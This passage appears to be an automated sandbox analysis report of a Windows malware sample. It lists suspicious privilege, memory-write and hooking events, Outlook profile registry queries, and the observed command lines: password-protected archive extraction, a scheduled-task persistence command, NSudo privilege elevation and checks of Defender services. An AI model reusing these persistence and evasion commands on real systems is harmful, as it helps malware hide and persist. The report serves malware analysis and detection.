N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\Patchfm\Tu_Inspector32.exe N/A
N/A N/A C:\ProgramData\Patchfm\Tu_Inspector32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Temper\pTLQnagR.exe N/A
Token: 35 N/A C:\Temper\pTLQnagR.exe N/A
Token: SeSecurityPrivilege N/A C:\Temper\pTLQnagR.exe N/A
Token: SeSecurityPrivilege N/A C:\Temper\pTLQnagR.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\Work\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Temper\mSPVyMsH.exe N/A
N/A N/A C:\Temper\mSPVyMsH.exe N/A
N/A N/A C:\Temper\mSPVyMsH.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FKI5Q.tmp\O1sOUoo.tmp N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-1ECSM.tmp\O1sOUoo.tmp N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Temper\mSPVyMsH.exe N/A
N/A N/A C:\Temper\mSPVyMsH.exe N/A
N/A N/A C:\Temper\mSPVyMsH.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 464 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\74ab73fc76f764527ece4358fca9df921acb78d67ec7062ad549036e902ac0f4.exe C:\Temper\mSPVyMsH.exe
PID 464 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\74ab73fc76f764527ece4358fca9df921acb78d67ec7062ad549036e902ac0f4.exe C:\Temper\mSPVyMsH.exe
PID 464 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\74ab73fc76f764527ece4358fca9df921acb78d67ec7062ad549036e902ac0f4.exe C:\Temper\mSPVyMsH.exe
PID 4356 wrote to memory of 2832 N/A C:\Temper\mSPVyMsH.exe C:\Windows\SysWOW64\cmd.exe
PID 4356 wrote to memory of 2832 N/A C:\Temper\mSPVyMsH.exe C:\Windows\SysWOW64\cmd.exe
PID 4356 wrote to memory of 2832 N/A C:\Temper\mSPVyMsH.exe C:\Windows\SysWOW64\cmd.exe
PID 2832 wrote to memory of 4168 N/A C:\Windows\SysWOW64\cmd.exe C:\Temper\pTLQnagR.exe
PID 2832 wrote to memory of 4168 N/A C:\Windows\SysWOW64\cmd.exe C:\Temper\pTLQnagR.exe
PID 2832 wrote to memory of 4168 N/A C:\Windows\SysWOW64\cmd.exe C:\Temper\pTLQnagR.exe
PID 4356 wrote to memory of 5732 N/A C:\Temper\mSPVyMsH.exe C:\Temper\pzoljWug.exe
PID 4356 wrote to memory of 5732 N/A C:\Temper\mSPVyMsH.exe C:\Temper\pzoljWug.exe
PID 4356 wrote to memory of 5732 N/A C:\Temper\mSPVyMsH.exe C:\Temper\pzoljWug.exe
PID 4356 wrote to memory of 1152 N/A C:\Temper\mSPVyMsH.exe C:\Temper\dHzrrTgp.exe
PID 4356 wrote to memory of 1152 N/A C:\Temper\mSPVyMsH.exe C:\Temper\dHzrrTgp.exe
PID 4356 wrote to memory of 1152 N/A C:\Temper\mSPVyMsH.exe C:\Temper\dHzrrTgp.exe
PID 4356 wrote to memory of 3836 N/A C:\Temper\mSPVyMsH.exe C:\Windows\SysWOW64\cmd.exe
PID 4356 wrote to memory of 3836 N/A C:\Temper\mSPVyMsH.exe C:\Windows\SysWOW64\cmd.exe
PID 4356 wrote to memory of 3836 N/A C:\Temper\mSPVyMsH.exe C:\Windows\SysWOW64\cmd.exe
PID 3836 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3836 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3836 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1152 wrote to memory of 4544 N/A C:\Temper\dHzrrTgp.exe C:\Windows\SysWOW64\cmd.exe
PID 1152 wrote to memory of 4544 N/A C:\Temper\dHzrrTgp.exe C:\Windows\SysWOW64\cmd.exe
PID 1152 wrote to memory of 4544 N/A C:\Temper\dHzrrTgp.exe C:\Windows\SysWOW64\cmd.exe
PID 5732 wrote to memory of 316 N/A C:\Temper\pzoljWug.exe C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
PID 5732 wrote to memory of 316 N/A C:\Temper\pzoljWug.exe C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
PID 5732 wrote to memory of 316 N/A C:\Temper\pzoljWug.exe C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
PID 4544 wrote to memory of 880 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe
PID 4544 wrote to memory of 880 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe
PID 4544 wrote to memory of 5664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4544 wrote to memory of 5664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4544 wrote to memory of 5664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4544 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4544 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4544 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4544 wrote to memory of 5052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4544 wrote to memory of 5052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4544 wrote to memory of 5052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4544 wrote to memory of 1128 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe
PID 4544 wrote to memory of 1128 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe
PID 316 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe
PID 316 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe
PID 316 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe
PID 3656 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe C:\Users\Admin\AppData\Local\Temp\is-V0DA8.tmp\O1sOUoo.tmp
PID 3656 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe C:\Users\Admin\AppData\Local\Temp\is-V0DA8.tmp\O1sOUoo.tmp
PID 3656 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe C:\Users\Admin\AppData\Local\Temp\is-V0DA8.tmp\O1sOUoo.tmp
PID 4544 wrote to memory of 2400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mode.com
PID 4544 wrote to memory of 2400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mode.com
PID 4544 wrote to memory of 2400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mode.com
PID 4544 wrote to memory of 5676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4544 wrote to memory of 5676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4544 wrote to memory of 5676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4544 wrote to memory of 4784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4544 wrote to memory of 4784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4544 wrote to memory of 4784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4544 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 4544 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 4544 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1356 wrote to memory of 5716 N/A C:\Users\Admin\AppData\Local\Temp\is-V0DA8.tmp\O1sOUoo.tmp C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe
PID 1356 wrote to memory of 5716 N/A C:\Users\Admin\AppData\Local\Temp\is-V0DA8.tmp\O1sOUoo.tmp C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe
PID 1356 wrote to memory of 5716 N/A C:\Users\Admin\AppData\Local\Temp\is-V0DA8.tmp\O1sOUoo.tmp C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe
PID 4544 wrote to memory of 2808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4544 wrote to memory of 2808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4544 wrote to memory of 2808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

outlook_office_path

Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A

outlook_win_path

Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\74ab73fc76f764527ece4358fca9df921acb78d67ec7062ad549036e902ac0f4.exe

"C:\Users\Admin\AppData\Local\Temp\74ab73fc76f764527ece4358fca9df921acb78d67ec7062ad549036e902ac0f4.exe"

C:\Temper\mSPVyMsH.exe

"C:\Temper\mSPVyMsH.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c ""C:\Temper\pTLQnagR.exe" x -aoa -bso0 -bsp1 "C:\Temper\BJwqsqOu.zip" -pXx7hItTR -o"C:\Temper""

C:\Temper\pTLQnagR.exe

"C:\Temper\pTLQnagR.exe" x -aoa -bso0 -bsp1 "C:\Temper\BJwqsqOu.zip" -pXx7hItTR -o"C:\Temper"

C:\Temper\pzoljWug.exe

"C:\Temper\pzoljWug.exe"

C:\Temper\dHzrrTgp.exe

"C:\Temper\dHzrrTgp.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn "duLGPTLJO" /tr "C:\Temper\mSPVyMsH.exe" /sc minute /mo 10 /ru "Admin" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "duLGPTLJO" /tr "C:\Temper\mSPVyMsH.exe" /sc minute /mo 10 /ru "Admin" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\l5SkW3O.bat" "

C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe

"C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe"

C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe

nircmd win min process "cmd.exe"

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\reg.exe

reg query "HKU\S-1-5-19"

C:\Windows\SysWOW64\reg.exe

reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f

C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe

NSudoLG -U:T -P:E -UseCurrentConsole "C:\Users\Admin\AppData\Local\Temp\l5SkW3O.bat" any_word

C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe

"C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe"

C:\Users\Admin\AppData\Local\Temp\is-V0DA8.tmp\O1sOUoo.tmp

"C:\Users\Admin\AppData\Local\Temp\is-V0DA8.tmp\O1sOUoo.tmp" /SL5="$1001D4,2446010,818176,C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe"

C:\Windows\SysWOW64\mode.com

Mode 79,49

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ver

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"

C:\Windows\SysWOW64\find.exe

find /i "0x0"

C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe

"C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe" /VERYSILENT

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c tasklist

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\is-FKI5Q.tmp\O1sOUoo.tmp

"C:\Users\Admin\AppData\Local\Temp\is-FKI5Q.tmp\O1sOUoo.tmp" /SL5="$1101D4,2446010,818176,C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe" /VERYSILENT

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\WinDefend"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"

C:\Windows\SysWOW64\reg.exe

